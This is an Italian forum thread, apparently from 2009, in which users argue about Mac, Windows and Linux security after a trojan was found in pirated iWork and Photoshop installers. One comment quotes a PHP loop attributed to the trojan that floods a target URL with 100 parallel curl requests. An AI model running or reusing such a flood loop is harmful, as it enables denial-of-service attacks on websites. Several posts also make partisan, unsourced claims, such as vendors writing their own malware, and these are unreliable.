            client...
            usano gli strumenti che hanno, non possono fare le magie....proprio 2 giorni fa fu emesso un comunicato del CERT in cui si bacchettava MS per aver detto un mucchio di XXXXXXX circa la disabilitazione dell'autorun da media removibili....allo stato attuale un utente normale non lo può disabilitare e quindi finisce per essere infettato
            E visto che i MAC sono la 10% di share ed il
            trend è in
            crescita

            http://marketshare.hitslink.com/os-market-share.as

            ecco spiegato l'interesse dei virus-writer, più
            ce n'è di MAC e più macachi utonti e scaricatori
            di programmi piratati ci saranno... that's
            all.si ma io stavo parlando del settore web server, in cui linux ha lo share maggiore, eppure i server linux non vengono attaccati per ficcare nei siti ospitati gli iframe spara-malwareil succo è che windows ha un maggior numero di bug sfruttabili da remoto e questo è un grossissimo problemaè naturale che se scarichi e installi i virus con le tue mani, con chi te la vuoi prendere poi? ma qui si parla di tutt'altro e cioè di worm e delle falle che usanoe tra un trojan e un worm c'è una differenza abissale in termini di capacità e velocità di spreading e nel fatto che un worm s'installa all'insaputa dell'utenteil servizio RPC di Windows è pieno di falle da anni....la prima fu usata da Sasser, poi patchata e subito ne ricomparve un'altra, presente addirittura nel codice della patch stessa.....quando decideranno di fare un bell'auditing a windows e risolvere questi, ripeto, gravissimi bug?
          • nome e cognome scrive:
            Re: cvd: e' solo questione di diffusione


            Ti sei perso per strada le clamorose intrusioni

            nei sistemi di redhat e apache? Ancora non si sa

            esattamente come li hanno traforati... alla

            faccia

            dell'open.
            no si sa, rubarono le password ftp dai PC windows
            di alcuni
            contributorSi, e a Rosswell atterro' un ufo.
            hai sbagliato riferimento, io non parlo di
            attacchi contro le web applications, ma di
            attacchi contro il sistema operativo che si sono
            verificati anche nell'ultimo caso della
            famigerata vulnerabilità che ha portato alla
            diffusione di
            ConfickerE secondo te un amministratore che ha un server web dopo quanto patcha il server contro una vulnerabilita' remota? Secondo te quanti server debian avevano le chiavi predittibili dopo la pubblicazione della patch?Non ha alcun senso cercare di colpire i server web per diffondere malware, e' uno sforzo che dura lo spazio di pochi minuti mentre spedendo email si ottiene molto di piu' con meno fatica.
            e non è la prima volta che agiscono così....neiTipo? Casi ecclatanti e recenti di server web windows compromessi per vulnerabilita' del SO?
            confronti di linux non hanno mai agito in questo
            modo e questo perchè non esistono vulnerabilità
            sfruttabili da remoto da almeno 18 mesi .... vaiE' ovvio che se guardi il kernel non trovi vulnerabilita' sfruttabili da remoto e' come pensare di trovarle nella calcolatrice di windows, ma prova a guardare php o apache ad esempio.
            su frsirt e fatti un bel giro e forse capirai
            qualcosa di come funzionano gli attacchi ai
            sistemi
            informaticiEggia'...
    • The Punisher scrive:
      Re: cvd: e' solo questione di diffusione
      - Scritto da: nome e cognome
      trovare mac collegati in rete
      permanentemente (ovvero nelle aziende) e'
      praticamente impossibileCosi', tanto per farti un esempio in Italia: RCS ((Rizzoli Corriere della Sera) Mediagroup, Via Rizzoli 2 a Milano.30 XServe ed un migliaio di Mac in giro per la rete (stesse subnet dei Pc).Cosi' tanto per gradire.
      • nome e cognome scrive:
        Re: cvd: e' solo questione di diffusione
        - Scritto da: The Punisher
        - Scritto da: nome e cognome

        trovare mac collegati in rete

        permanentemente (ovvero nelle aziende) e'

        praticamente impossibile

        Cosi', tanto per farti un esempio in Italia: RCS
        ((Rizzoli Corriere della Sera) Mediagroup, Via
        Rizzoli 2 a
        Milano.

        30 XServe ed un migliaio di Mac in giro per la
        rete (stesse subnet dei
        Pc).

        Cosi' tanto per gradire.Ecco perche' il sito del corriere fa cosi' schifo...
  • a n o n i m o scrive:
    Articolo R-I-D-I-C-O-L-O
    premesso che Annunziata col suo fare da ragazzino fanboy sta iniziando a scocciare causa mancanza sempre più marcata di obbiettività e rigore giornalistico,trovo questo articolo semplicemente RIDICOLO .intanto per cominciare la segnalazione su questo fantomatico "trojan" risale alla settimana scorsa, il giorno 23 è stata addirittura segnalata su questi forum:http://www.piforum.it/b.aspx?i=2532187#p2532187inoltre l'assenza di fonti chiare ed inequivocabili (se non i pusher di antivirus di turno) la fanno da padrona su questo ennesimo "articolo" pro FUD firmato annunziata, anche se bastano 3 minuti di ricerca per trovare tutti i riferimenti che si vogliono:http://notahat.com/posts/28http://www.f-secure.com/v-descs/backdoor_osx_iworkserv_a.shtmlhttp://isc.sans.org/diary.html?storyid=5743&rsshttp://ithreats.wordpress.com/2009/01/23/si trovano perfino le attività in dettaglio di questo "virus" (che virus non è, poichè non ha modo di riprodursi)[code]php -r while(1){ $mh = curl_multi_init(); $ch = array(); for($i = 0; $i < 100; $i++){ ^I$ch[$i] = curl_init(); ^Icurl_setopt($ch[$i], CURLOPT_URL, "http://..."); ^Icurl_setopt($ch[$i], CURLOPT_HEADER, 0); ^Icurl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); ^Icurl_multi_add_handle($mh, $ch[$i]); } do{ ^Icurl_multi_exec($mh, $running); } while($running
    0); for($i = 0; $i < 100; $i++){ ^Icurl_multi_remove_handle($mh, $ch[$i]); } curl_multi_close($mh); }[/code]cioè un banale dDos in php ad un sito;PI che vogliamo fare? continuiamo con articoli alla studio aperto o vogliamo tornare ad essere un punto di riferimento?
    • nome e cognome scrive:
      Re: Articolo R-I-D-I-C-O-L-O

      PI che vogliamo fare? continuiamo con articoli
      alla studio aperto o vogliamo tornare ad essere
      un punto di
      riferimento?Li hai letti gli articoli che citi? Krowi is a nasty P2P controlled bot that is similar to known Storm Worm.Infected OS X users machine can be controlled remotely by the bot master. It can be used to participate in a massive Distributed Denial of Service attack(DDoS) , install further application (like software from Pay-per-Install ), spam and distribute malware and may gather user data.E sempre in uno dei link alla fine l'autore dice So, that said, think about an AV for your Mac.Quindi che facciamo cari macachi le leviamo le fette di salame dagli occhi?
      • a n o n i m o scrive:
        Re: Articolo R-I-D-I-C-O-L-O
        - Scritto da: nome e cognome

        PI che vogliamo fare? continuiamo con articoli

        alla studio aperto o vogliamo tornare ad essere

        un punto di

        riferimento?

        Li hai letti gli articoli che citi?

        Krowi is a nasty P2P controlled bot that is
        similar to known Storm
        Worm.
        che ne dici di procurarti un buon dizionario?
        Infected OS X users machine can be controlled
        remotely by the bot master. It can be used to
        participate in a massive Distributed Denial of
        Service attack(DDoS) , install further
        application (like software from Pay-per-Install
        ), spam and distribute malware and may gather
        user
        data.
        prove: zero.
        E sempre in uno dei link alla fine l'autore dice

        So, that said, think about an AV for your Mac.bastano 3 comandi in croce o uno script da 10 righe per rimuovere la backdoor, antivirus per fare cosa? per rilevare il virus che non c'è?
        Quindi che facciamo cari macachi le leviamo le
        fette di salame dagli
        occhi?clap clap clap bravo pistola hai detto la tua frase ad effetto, contento adesso?avanti col prossimo.
        • nome e cognome scrive:
          Re: Articolo R-I-D-I-C-O-L-O


          Krowi is a nasty P2P controlled bot that is

          similar to known Storm

          Worm.



          che ne dici di procurarti un buon dizionario?Similar to, simile (a), dello stesso tipo (di)Quindi?

          Infected OS X users machine can be controlled

          remotely by the bot master. It can be used to

          participate in a massive Distributed Denial of

          Service attack(DDoS) , install further

          application (like software from Pay-per-Install

          ), spam and distribute malware and may gather

          user

          data.



          prove: zero.Quel php che hai allegato e' la prova che il worm e' stato usato per lanciare un ddos. E comunque lo scrive il sito che citi tu...

          So, that said, think about an AV for your Mac.

          bastano 3 comandi in croce o uno script da 10
          righe per rimuovere la backdoor, antivirus per
          fare cosa? per rilevare il virus che non
          c'è?Sempre che chi ti ha installato la backdoor non ti abbia brasato il pc prima o cambiato quei 3 comandi in croce con quelli scritti da lui, non ci vuole tanto sai? Pensa che bello il tuo rm -f invece di cancellare il worm lo infila in qualsiasi eseguibile.Il fatto che chi ha scritto il worm sia un principiante non vi mette al riparo ... ma continuate a pensare di essere al sicuro prima o poi ci farete fare una grassa risata.
          clap clap clap
          bravo pistola hai detto la tua frase ad effetto,
          contento
          adesso?Si mi diverto un sacco a vedere come vi arrabbiate voi macachi...
          avanti col prossimo.Prossimo worm dici...
          • a n o n i m o scrive:
            Re: Articolo R-I-D-I-C-O-L-O
            - Scritto da: nome e cognome


            Krowi is a nasty P2P controlled bot that is


            similar to known Storm


            Worm.






            che ne dici di procurarti un buon dizionario?

            Similar to, simile (a), dello stesso tipo (di)

            Quindi?
            quindi hai pure difficoltà a comprendere che una similitudine non è un'uguaglianza?


            Infected OS X users machine can be controlled


            remotely by the bot master. It can be used to


            participate in a massive Distributed Denial of


            Service attack(DDoS) , install further


            application (like software from
            Pay-per-Install


            ), spam and distribute malware and may gather


            user


            data.






            prove: zero.

            Quel php che hai allegato e' la prova che il worm
            e' stato usato per lanciare un ddos. E comunque
            lo scrive il sito che citi tu...
            ti sei letto anche dove parla degli host o hai fatto smart-reading tanto per darti un tono?


            So, that said, think about an AV for your Mac.



            bastano 3 comandi in croce o uno script da 10

            righe per rimuovere la backdoor, antivirus per

            fare cosa? per rilevare il virus che non

            c'è?

            Sempre che chi ti ha installato la backdoor non
            ti abbia brasato il pc prima o cambiato quei 3
            comandi in croce con quelli scritti da lui, non
            ci vuole tanto sai? Pensa che bello il tuo rm -f
            invece di cancellare il worm lo infila in
            qualsiasi
            eseguibile.[img]http://img182.imageshack.us/img182/6821/facepalmpicarqu2.jpg[/img]ah si è vero, i comandi me li può lanciare anche dal fantastico mondo del'errore 404, scordo sempre questi particolari...
            Il fatto che chi ha scritto il worm sia un
            principiante non vi mette al riparo ... ma
            continuate a pensare di essere al sicuro prima o
            poi ci farete fare una grassa risata.



            clap clap clap

            bravo pistola hai detto la tua frase ad effetto,

            contento

            adesso?

            Si mi diverto un sacco a vedere come vi
            arrabbiate voi macachi...
            ma quale arrabbiato, manco sai di che parli e mi dovrei arrabbiare con te? :D

            avanti col prossimo.

            Prossimo worm dici...ahem, per la verità deve ancora esserci il primo, ma considerando le tue "fonti" non mi sembra strano che tu non sappia una benemerita cippa.
  • dovella scrive:
    Apple a tappeto?
    Apple a tappeto?
    • MeX scrive:
      Re: Apple a tappeto?
      deve aspettare che Vista lo lasci libero...
    • uno qualunque scrive:
      Re: Apple a tappeto?
      Quanto ti amo...Ti sei conXXXXX anche il beneficio del dubbio.
      • The Punisher scrive:
        Re: Apple a tappeto?
        Anche perche' mentre scriveva si e' reso conto che se Apple e' al tappeto Windows (sul fronte virus) ha scavato talmente tanto che si e' ritrovato in Nuova Zelanda.
    • Steve Austin scrive:
      Re: Apple a tappeto?
      - Scritto da: dovella
      Apple a tappeto?Se va al tappeto non é per la sicurezza, al limite per il prezzo + crisi economica.Fate i MAC desktop (tipo LCII e non tipo skifom*rda applemini) a 800 euro maledetti!
  • N3m3s1s scrive:
    VIRUS creeati da ANTIVIRUS
    Sono sempre più convinto, che per guadagnarsi quel poco di fama e soprattutto per vendere...stesso le SOFTWARE HOUSE creano i propri codici per poi creargli l'antivirus ad-hoc.......altrimenti non si spiegherebbero ste minc.....ate!
    • MonsterS4r scrive:
      Re: VIRUS creeati da ANTIVIRUS
      - Scritto da: N3m3s1s
      Sono sempre più convinto, che per guadagnarsi
      quel poco di fama e soprattutto per
      vendere...stesso le SOFTWARE HOUSE creano i
      propri codici per poi creargli l'antivirus
      ad-hoc.......altrimenti non si spiegherebbero ste
      minc.....ate!QUOTOC'é gente che venderebbe la madre per un pugno di dollari
      • Patty scrive:
        Re: VIRUS creeati da ANTIVIRUS
        ...chissà perché mi vengono in mente quelle agenzie di vigilanza beccate anni fa a mettere ordigni esplosivi e negozi, aziende e fattorie...
        • MonsterS4r scrive:
          Re: VIRUS creeati da ANTIVIRUS
          A me (molto piu' malignamente) vengono in mente le case farmaceutiche.Sai come diceva Andreotti , "a pensar male spesso ci si azzecca!"
  • Enjoy with Us scrive:
    Per i soliti Mac....
    Tonti, forse non avete capito, inutile che minimizziate, è il prezzo del sucXXXXX! Questi sono solo i primi di una lunga serie di virus con cui anche il Mac si troverà a fare i conti!Il fatto che il Trojan per poter agire necessiti dei requisiti di amministratore vuol dire poco, se l'utente è obbligato a concedere tali requisiti per installare il programma craccato, anche nel mondo Win funziona così! Se tutti installassero solo software originale il rischio di infezioni sarebbe molto ma molto più ridotto!Ecco perchè è meglio Linux e il mondo open, li i crack non sono necessari e visto come è gestita l'installazione dei programmi è ben difficile che possa essere introdotto del software malevolo, se anche venisse fatto la cosa risulterebbe nota nel giro di poche ore, con l'eliminazione del programma!
    • Lemon scrive:
      Re: Per i soliti Mac....
      - Scritto da: Enjoy with Us
      Tonti, forse non avete capito, inutile che
      minimizziate, è il prezzo del sucXXXXX! Questi
      sono solo i primi di una lunga serie di virus con
      cui anche il Mac si troverà a fare i
      conti!
      Il fatto che il Trojan per poter agire necessiti
      dei requisiti di amministratore vuol dire poco,
      se l'utente è obbligato a concedere tali
      requisiti per installare il programma craccato,
      anche nel mondo Win funziona così! Se tutti
      installassero solo software originale il rischio
      di infezioni sarebbe molto ma molto più
      ridotto!
      Ecco perchè è meglio Linux e il mondo open, li i
      crack non sono necessari e visto come è gestita
      l'installazione dei programmi è ben difficile che
      possa essere introdotto del software malevolo, se
      anche venisse fatto la cosa risulterebbe nota nel
      giro di poche ore, con l'eliminazione del
      programma!Quoto, ma arriveranno anche quelli per linux vedrai. Anche il mondo Windows è pieno di software gratuiti ed affidabili, eppure c'è sempre l'utente che s scarica il "MagicAntivirus" o "SuperAntiSpyware" oppure l'"Office 2009 ITA - perfettamente funzionante"....
    • lellykelly scrive:
      Re: Per i soliti Mac....
      se accade su mac, accade pure su linux. magari con meno probabilità, ma il funzionamento è lo stesso.perchè credi che nessuno ti freghi? perchè non è mai capitato? ok, ma sei certo che non possa capitare?
      • lellykelly scrive:
        Re: Per i soliti Mac....
        il mondo open...c'è su mac e c'è su win. è UGUALE al tua amato linux.non ci sono sw commerciali su linux che richiedono un codice di attivazione? qualcuno avrà fatto un crak eventualmente? e perchè oltre al crak non può averci messo dentro un amichetto?perchè se usi linux sei un "puro di cuore"?
        • Enjoy with Us scrive:
          Re: Per i soliti Mac....
          - Scritto da: lellykelly
          il mondo open...

          c'è su mac e c'è su win. è UGUALE al tua amato
          linux.

          non ci sono sw commerciali su linux che
          richiedono un codice di attivazione? qualcuno
          avrà fatto un crak eventualmente? e perchè oltre
          al crak non può averci messo dentro un
          amichetto?

          perchè se usi linux sei un "puro di cuore"?Semplicemente perchè utilizzi software liberi e gratuiti e non hai bisogno di crack!Quindi i rischi di virus sono nettamente ridotti!
          • alexjenn scrive:
            Re: Per i soliti Mac....
            - Scritto da: Enjoy with Us

            Semplicemente perchè utilizzi software liberi e
            gratuiti e non hai bisogno di
            crack!
            Quindi i rischi di virus sono nettamente ridotti!Forse il contrario?Se sono talmente aperti, chiunque può modificare l'installer e distribuirlo a suo piacimento, o no?In ogni modo, quel trojan per Mac è come la notizia della spazzatura che non c'è più a Napoli.
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: alexjenn
            - Scritto da: Enjoy with Us




            Semplicemente perchè utilizzi software liberi e

            gratuiti e non hai bisogno di

            crack!

            Quindi i rischi di virus sono nettamente
            ridotti!

            Forse il contrario?

            Se sono talmente aperti, chiunque può modificare
            l'installer e distribuirlo a suo piacimento, o
            no?

            In ogni modo, quel trojan per Mac è come la
            notizia della spazzatura che non c'è più a
            Napoli.No! perchè i vari siti che ospitano il software open fanno i loro controlli e lo stesso i vari utenti, se una qualsiasi applicazione venisse taroccata in breve verrebbe scoperta ed eliminata, non solo si potrebbe risalire anche all'ip di chi l'ha caricata sul sito!La riprova è che a tutt'oggi nessun applicativo open è diventato un cavallo di XXXXX!
          • alexjenn scrive:
            Re: Per i soliti Mac....
            - Scritto da: Enjoy with Us

            No! perchè i vari siti che ospitano il software
            open fanno i loro controlli e lo stesso i vari
            utenti, se una qualsiasi applicazione venisse
            taroccata in breve verrebbe scoperta ed
            eliminata, non solo si potrebbe risalire anche
            all'ip di chi l'ha caricata sul
            sito!
            La riprova è che a tutt'oggi nessun applicativo
            open è diventato un cavallo di
            XXXXX!Ovvio, sarebbe come darsi la zappa sui piedi.Guarda che questo iWork infettato che girerebbe sui siti non è craccato, né ha bisogno di crack. Quindi è ovvio che, se esiste questo trojan, è stata la stessa Intego a inserirla.Tra l'altro, iWork si può scaricare benissimo direttamente dal sito di Apple...
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: alexjenn
            - Scritto da: Enjoy with Us



            No! perchè i vari siti che ospitano il software

            open fanno i loro controlli e lo stesso i vari

            utenti, se una qualsiasi applicazione venisse

            taroccata in breve verrebbe scoperta ed

            eliminata, non solo si potrebbe risalire anche

            all'ip di chi l'ha caricata sul

            sito!

            La riprova è che a tutt'oggi nessun applicativo

            open è diventato un cavallo di

            XXXXX!

            Ovvio, sarebbe come darsi la zappa sui piedi.

            Guarda che questo iWork infettato che girerebbe
            sui siti non è craccato, né ha bisogno di crack.
            Quindi è ovvio che, se esiste questo trojan, è
            stata la stessa Intego a
            inserirla.

            Tra l'altro, iWork si può scaricare benissimo
            direttamente dal sito di
            Apple...Si certo come no sono tutti scemi....
          • alexjenn scrive:
            Re: Per i soliti Mac....
            - Scritto da: Enjoy with Us



            Tra l'altro, iWork si può scaricare benissimo

            direttamente dal sito di

            Apple...

            Si certo come no sono tutti scemi....Ti pareva che non mi avresti dato una risposta del genere...toh: http://www.apple.com/iwork/download-trial/e poi si usa la fantasia.
          • AhiAhi scrive:
            Re: Per i soliti Mac....
            sei proprio un cazzaro, sloggati vergnogna del forum
          • Joe Tornado scrive:
            Re: Per i soliti Mac....


            Semplicemente perchè utilizzi software liberi e
            gratuiti e non hai bisogno di
            crack!
            Quindi i rischi di virus sono nettamente ridotti!Questo è vero, ma ormai le alternative gratuite ai software commerciali più comuni ci sono. Una volta avevo crakkato di tutto, a cominciare da WinZip, ora ... non mi viene in mente nulla
      • -ToM- scrive:
        Re: Per i soliti Mac....
        - Scritto da: lellykelly
        se accade su mac, accade pure su linux. magari
        con meno probabilità, ma il funzionamento è lo
        stesso.della serie, "siccome non posso essere meglio di te, faccio in modo che tu sia peggio di me"
        • lellykelly scrive:
          Re: Per i soliti Mac....
          ridicolo additare le barche che affondano sapendo che la propria è dello stesso materiale
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: lellykelly
            ridicolo additare le barche che affondano sapendo
            che la propria è dello stesso
            materialeda semre la politica di Jobs e dei suoi adepti nei confronti di windows.Solo che win è un colabrodo da sempre, OSX non presunto tale lo stiamo scoprendo adesso...questa l´hai proprio sbagliata.
          • bibop scrive:
            Re: Per i soliti Mac....
            cavolo la torta di PERE fa schifo.. e' si' le ALBICOCCHE erano acerbe!questa e' la logica del tuo post!la struttura di osx e' diversa e sicura nei limiti dell'intelligenza dell'utente da sempre... come windows non lo e' mai stato fino a 2 anno fa... ( microsoft solo con vista ha prodotto un windows con parvenza di struttura sicura... xpsp2 ci provava con scarsi risultati)da sempre un "attacco" come iSevices e' potenzialmente pericoloso per osx, lo e' su qualsiasi piattaforma... quando(se) i virus o i malware entreranno in osx di gran passo (come pare sia possibile iniettando codice nella ram, pare nn ancora dimostrato pubblicamente, e le "condizioni" sono abbastanza articolate, pare) semplicemente collegandosi alla rete o navigando allora ci sara' da preoccuparsi, per ora e' solo quello che sta tra la tastiera e lo schienale della sedia a consentire di fare danni a/su osx.
          • pippo scrive:
            Re: Per i soliti Mac....

            per ora e' solo
            quello che sta tra la tastiera e lo schienale
            della sedia a consentire di fare danni a/su
            osx.Anche su windows, il problema più grosso è proprio questo :D
          • bibop scrive:
            Re: Per i soliti Mac....
            forse con vista... ma nn ci metterei la mano sul fuoco... ossia il 20% delle installazione windows... nn fa praticamente testo, per ora lo standard windows e' xpsp2 :) quindi anni luce lontano dalla sicurezza di osx...
          • pippo scrive:
            Re: Per i soliti Mac....

            forse con vista... ma nn ci metterei la mano sul
            fuoco... ossia il 20% delle installazione
            windows... nn fa praticamente testo, per ora lo
            standard windows e' xpsp2 :) quindi anni luce
            lontano dalla sicurezza di
            osx...P.S. xpsp3
          • bibop scrive:
            Re: Per i soliti Mac....
            si si sp3... il succo comunque e' che la struttura di windows pre vista non e' paragonabile ne associabile in quanto a sicurezza a osx... in quel caso oltre al pericolo "utente" c'e' quello oggettivo delle pecche di design eccecc...
          • -ToM- scrive:
            Re: Per i soliti Mac....
            ci descrivi le differenze sostanziali secondo cui XP e Vista sono differenti a livello di sicurezza?ma a parole tue, niente links.
          • bibop scrive:
            Re: Per i soliti Mac....
            io nn ti descrivo nulla con parole mie... se nn lo sai da solo, perche' parli di certi argomenti, e se pensi che vista e xp siano "sostanzialmente" uguali in quanto a sicurezza... andiamo bene...
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: bibop
            io nn ti descrivo nulla con parole mie... se nn
            lo sai da solo, perche' parli di certi argomenti,
            e se pensi che vista e xp siano "sostanzialmente"
            uguali in quanto a sicurezza... andiamo
            bene...ma che ti rispondo a fare, tu sei quello che insieme a Goldenboy avete scatenato una rissa quando dissi che OSX è un sistema blindato, quando è la stessa Apple a farlo capire senza troppi rigiri (in realtà è proprio palese, ma a tanta gente piace mettere la testa sotto la sabbia).
          • bibop scrive:
            Re: Per i soliti Mac....
            ahahahaha si si certo hai perfettamente ragione su tutta la linea!!! sempre comunque e anche quando sbagli sei nel giusto... ti ringraziamo di illuminarci ogni giorno con le tue perle di saggezza come la seguente:non c'e' differenza sostanziale tra il modello di sicurezza di xp e quello di vistacome nn darti torto! uguale = stesse caratteristiche pregi e difetti (senno ti attacchi alla parola...) dopo la precisazione continuiamo...certo che se il modello di sicurezza di vista e' uguale a quello di xp e quello di xp e' uguale a quello di osx e dei bsd allora ci sono migliaia di pagine scritte per nulla sulla superiorita' strutturale di tali sistemi operativi... ma sicuramente hai ragione te!! si si... come no... ma vai a spigare va'!
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: bibop
            ahahahaha si si certo hai perfettamente ragione
            su tutta la linea!!! sempre comunque e anche
            quando sbagli sei nel giusto... ti ringraziamo di
            illuminarci ogni giorno con le tue perle di
            saggezza come la
            seguente:

            non c'e' differenza sostanziale tra il modello di
            sicurezza di xp e quello di
            vistaquesto te l'eri perso eh?http://punto-informatico.it/b.aspx?i=2536501&m=2537433#p2537433questa: http://punto-informatico.it/b.aspx?i=2536501&m=2537580#p2537580 è una domanda vera, solo un fanatico può dedurre che da una domanda, chi la pone sostenga il contrario.Sono contento che questi thread rimangono indelebilmente impressi sul DB di PI, così dopo una lunga collezione, gli ignoranti come te si spera smettano in futuro di essere recidivi sul trollare in questo forum.
          • lellykelly scrive:
            Re: Per i soliti Mac....
            oh sentite eh... da quando ho windows, mi si è sXXXXXXXto o perchè c'era quella roba che se lo attaccavi ad un modem adsl era finita, o perchè ho cliccato ignora quando l'antivirus mi ha detto che nel keygen c'era un virus...altrimenti NIENTE!e NIENTE su mac.il computer è stupido, e spesso lo è pure l'utente.
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: lellykelly
            oh sentite eh... da quando ho windows, mi si è
            sXXXXXXXto o perchè c'era quella roba che se lo
            attaccavi ad un modem adsl era finita, o perchè
            ho cliccato ignora quando l'antivirus mi ha detto
            che nel keygen c'era un
            virus...

            altrimenti NIENTE!
            e NIENTE su mac.ti dimentichi che è la TUA esperienza è una nel mondo e che cè gente che con windows ha una esperienza opposta, da sempre.(certo questo non esclude problemi, ma nessun OS ne è privo)Tanto per dirne una, anche con configurazioni HW identiche, su workstation marchiate (IBM, dell, ecc) in certi campi si ha stabilità e prestazioni maggiori delle controparti assemblate (inutile spiegare come mai vero?).
            il computer è stupido, e spesso lo è pure
            l'utente.non voglio assolutamente darti dello stupido ma se tanta gente con windows va bene e non becca virus, forse il lato negativo della tua esperienza è dato da te stesso.
          • AhiAhi scrive:
            Re: Per i soliti Mac....
            - Scritto da: -ToM-
            - Scritto da: lellykelly

            oh sentite eh... da quando ho windows, mi si è

            sXXXXXXXto o perchè c'era quella roba che se lo

            attaccavi ad un modem adsl era finita, o perchè

            ho cliccato ignora quando l'antivirus mi ha
            detto

            che nel keygen c'era un

            virus...



            altrimenti NIENTE!

            e NIENTE su mac.

            ti dimentichi che è la TUA esperienza è una nel
            mondo e che cè gente che con windows ha una
            esperienza opposta, da
            sempre.
            (certo questo non esclude problemi, ma nessun OS
            ne è
            privo)
            Tanto per dirne una, anche con configurazioni HW
            identiche, su workstation marchiate (IBM, dell,
            ecc) in certi campi si ha stabilità e prestazioni
            maggiori delle controparti assemblate (inutile
            spiegare come mai
            vero?).


            il computer è stupido, e spesso lo è pure

            l'utente.

            non voglio assolutamente darti dello stupido ma
            se tanta gente con windows va bene e non becca
            virus, forse il lato negativo della tua
            esperienza è dato da te
            stesso.guarda che se non fa statistica lui non la fai neanche tu..
          • lellykelly scrive:
            Re: Per i soliti Mac....
            e io cosa ho scritto? non il contrario di certo
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: bibop
            cavolo la torta di PERE fa schifo.. e' si' le
            ALBICOCCHE erano
            acerbe!

            questa e' la logica del tuo post!no, il mio era l´esempio.come al solito quando si è alla frutta si gira la frittata.
            la struttura di osx e' diversa e sicura nei
            limiti dell'intelligenza dell'utente da sempre...
            come windows non lo e' mai stato fino a 2 anno
            fa... ( microsoft solo con vista ha prodotto un
            windows con parvenza di struttura sicura... xpsp2
            ci provava con scarsi risultati)sbagliato, potevi usare utenti limitati anche con le versioni vecchie di NT.
            da sempre un "attacco" come iSevices e'
            potenzialmente pericoloso per osx, lo e' su
            qualsiasi piattaforma... quando(se) i virus o i
            malware entreranno in osx di gran passo (come
            pare sia possibile iniettando codice nella ram,
            pare nn ancora dimostrato pubblicamente, e le
            "condizioni" sono abbastanza articolate, pare)
            semplicemente collegandosi alla rete o navigando
            allora ci sara' da preoccuparsi, per ora e' solo
            quello che sta tra la tastiera e lo schienale
            della sedia a consentire di fare danni a/su
            osx.se se :)ma vi mettete d´accordo fra mac user per scrivere tutti la stessa cosa o questa presunta sicurezza la sente ognuno di voi in maniera distinta?
          • bibop scrive:
            Re: Per i soliti Mac....
            no tesoro caro .. rigirare la frittata e' quello che fai tu quando metti sullo stesso piano il modello di sicurezza di osx e quello di windows pre vista... a si gli accessi limitati li aveva anche nt? oddio mi era sfuggita... e a quegli accessi limitati che anche nt aveva pero' sfuggivano le migliaia di schifezze che solo dopo il sp2 di xp sono riusciti relativamente ad arginare....
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: bibop
            no tesoro caro .. rigirare la frittata e' quello
            che fai tu quando metti sullo stesso piano il
            modello di sicurezza di osx e quello di windows
            pre vista...guarda che i tuoi "colleghi" hanno asserito che dipende dall'utente anche su OSX.Non hai neanche alleati "in casa", non è un mio delirio quando metto in relazione OSX e Windows da un punto di vista sicurezza.Che ci siano differenze sostanziali è vero, ma è anche vero che vi siete beccati un trojan con la stessa modalità con cui si beccano su win, solo che a te ti piace pensare il contrario.
            a si gli accessi limitati li aveva
            anche nt? oddio mi era sfuggita... e a quegli
            accessi limitati che anche nt aveva pero'
            sfuggivano le migliaia di schifezze che solo dopo
            il sp2 di xp sono riusciti relativamente ad
            arginare....cosa si diceva scusa ? ah si, girare la frittata.Bastava dire, "ah si? non lo sapevo, PUNTO"-----------------------------------------------------------Modificato dall' autore il 29 gennaio 2009 21.16-----------------------------------------------------------
          • bibop scrive:
            Re: Per i soliti Mac....
            e dove l'ho scritto che mi piace pensare il contrario??io confermo che dire che osx e windows sono sullo stesso piano per quello che riguarda la sicurezza e' da ignoranti... confermo che qualunque sistema operativo puo' essere scardinato dall'utente... se l'utente ha abbastanza perseveranza e privilegi... che un trojan fa testo ma e' un px bruciato contro un monitor sXXXXXXXto (perche', oppure vuoi affermare il contrario, windows e' assediato da ogni genere di schifezza e i trojan sono una parte relativa...)cmq sia sei delirante...
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: bibop
            cmq sia sei delirante...i miei reply te li scrivi da solo, quello che dici replica al posto mio.PS.: http://punto-informatico.it/b.aspx?i=2536501&m=2537716#p2537716PLONK
    • MeX scrive:
      Re: Per i soliti Mac....
      siamo ancora molto lontani da un virus.Questo é un pacchetto inserito in programmi molto appetibili e la richiesta della password é giustificata dall'installazione di iWork e Photoshop (che richiedono la password anche se non sono infetti)Sicuramente é un problema di sicurezza, anche se c'é da dire che su MAC praticamente MAI si cracca software ma si usano semplicemente i seriali (ti scarichi la trial di iWork dal sito Apple e sei a posto)Il virus é un meccanismo molto piú perverso.Su win ti basta aprire una email con un po' di javascript e sei fregato, o inserire una chiavetta USB con l'autorun.inf e ti ritrovi infettato... in piú se sei in una lan magicamente tutti i PC collegati risulteranno infetti...Qui si parla di un trojan, che si installa in seguito ad un'azione volontaria dell'utente... e comunque, basta cancellare il file e killare il proXXXXX e il trojan sparisce.... in win invece i virus si autoreplicano, si annidano nel registro etc etc...Mi sembra che siamo ancora molto lontani da questo tipo di problematiche di sicurezza su mac!
      • ruppolo scrive:
        Re: Per i soliti Mac....
        - Scritto da: MeX
        Il virus é un meccanismo molto piú perverso.
        Su win ti basta aprire una email con un po' di
        javascript e sei fregato, o inserire una
        chiavetta USB con l'autorun.inf e ti ritrovi
        infettato... in piú se sei in una lan magicamente
        tutti i PC collegati risulteranno
        infetti...

        Qui si parla di un trojan, che si installa in
        seguito ad un'azione volontaria dell'utente... e
        comunque, basta cancellare il file e killare il
        proXXXXX e il trojan sparisce.... in win invece i
        virus si autoreplicano, si annidano nel registro
        etc
        etc...

        Mi sembra che siamo ancora molto lontani da
        questo tipo di problematiche di sicurezza su
        mac!Gli hai rovinato la giornata :D
      • Lemon scrive:
        Re: Per i soliti Mac....


        Qui si parla di un trojan, che si installa in
        seguito ad un'azione volontaria dell'utente... e
        comunque, basta cancellare il file e killare il
        proXXXXX e il trojan sparisce.... in win invece i
        virus si autoreplicano, si annidano nel registro
